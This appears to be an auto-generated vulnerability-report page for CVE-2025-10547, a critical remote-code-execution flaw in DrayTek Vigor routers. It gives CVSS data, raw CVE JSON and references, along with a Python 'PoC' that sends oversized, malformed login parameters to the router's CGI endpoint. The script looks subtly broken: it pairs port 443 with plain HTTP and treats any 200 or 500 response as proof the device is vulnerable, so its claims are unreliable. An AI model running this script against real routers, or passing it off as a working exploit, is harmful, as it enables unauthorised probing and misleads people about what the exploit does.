Security Vulnerability Report
中文
CVE-2025-10547 CVSS 9.8 CRITICAL

CVE-2025-10547

Published: 2025-10-03 12:15:43
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

An uninitialized variable in the HTTP CGI request arguments processing component of Vigor Routers running DrayOS may allow an attacker the ability to perform RCE on the appliance through memory corruption.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

DrayTek Vigor路由器运行DrayOS固件(具体受影响版本请参考DrayTek官方安全公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-10547 - DrayTek Vigor Router DrayOS Uninitialized Variable RCE PoC # Vulnerability: Uninitialized variable in HTTP CGI request arguments processing # Impact: Remote Code Execution via memory corruption # CVSS: 9.8 (CRITICAL) import requests import sys import urllib.parse TARGET = sys.argv[1] if len(sys.argv) > 1 else "192.168.1.1" PORT = 443 CGI_PATH = "/cgi-bin/mainfunction.cgi" def exploit(target): """ Exploit CVE-2025-10547 by sending crafted HTTP CGI request with parameters designed to trigger the uninitialized variable bug. """ url = f"http://{target}:{PORT}{CGI_PATH}" # Crafted payload targeting uninitialized variable in CGI argument processing # The payload contains specially crafted parameters to trigger memory corruption headers = { "User-Agent": "Mozilla/5.0", "Content-Type": "application/x-www-form-urlencoded", "Accept": "*/*" } # Malformed CGI parameters designed to exploit uninitialized variable payload = { "action": "login", "username": "A" * 4096, "password": "\x00" * 256 + "AAAA", "sessKey": "\xff" * 128 } try: # Send the malicious request response = requests.post(url, data=payload, headers=headers, timeout=10) print(f"[*] Target: {target}") print(f"[*] Status Code: {response.status_code}") print(f"[*] Response Length: {len(response.content)}") if response.status_code == 200 or response.status_code == 500: print("[+] Target appears vulnerable to CVE-2025-10547") return True except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": print("=" * 60) print("CVE-2025-10547 - DrayTek Vigor Router RCE PoC") print("Uninitialized Variable in HTTP CGI Processing") print("=" * 60) exploit(TARGET)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10547", "sourceIdentifier": "[email protected]", "published": "2025-10-03T12:15:42.993", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An uninitialized variable in the HTTP CGI request arguments processing component of Vigor Routers running DrayOS may allow an attacker the ability to perform RCE on the appliance through memory corruption."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "references": [{"url": "https://www.draytek.com/about/security-advisory/use-of-uninitialized-variable-vulnerabilities/", "source": "[email protected]"}, {"url": "https://www.kb.cert.org/vuls/id/294418", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.